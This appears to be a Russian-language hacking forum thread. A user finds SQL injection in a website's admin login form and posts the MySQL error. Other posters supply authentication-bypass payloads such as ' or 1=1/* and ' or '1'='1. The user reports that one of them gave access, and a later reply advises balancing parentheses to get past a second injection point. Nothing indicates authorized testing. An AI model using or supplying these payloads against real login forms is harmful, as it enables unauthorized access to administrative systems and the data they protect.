Нашел скулю в форме авторизации админа.
В форму ввожу login:admin pass:' , выдает :

SELECT AId FROM adm_admins WHERE ALogin='admin' AND APassword='''Ошибка выполнения запроса. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1. Выполнение прервано

Что посоветуете? :confused:

blablabla' or 1=1/*
?:\

']blablabla' or 1=1/*
?:\
blablabla' or '1'='1
мона вот так..

Прошло вот так ' or '1'='1. Спасибо совсем забыл про or!

Прошло вот так ' or '1'='1. Спасибо совсем забыл про or!
Просто не всегда ясно, что там за ковычкой, по-этому сразу отсекать ее не стоит =\

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''))' at line 1
А вот в другом месте вот так, но уже выше что написано было не проходит.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''))' at line 1
А вот в другом месте вот так, но уже выше что написано было не проходит.
а в каком параметре или контексте?
скорее всего надо скобки еще просовывать закрывающие и открывающие(либо отсекать реальные закрывающие)..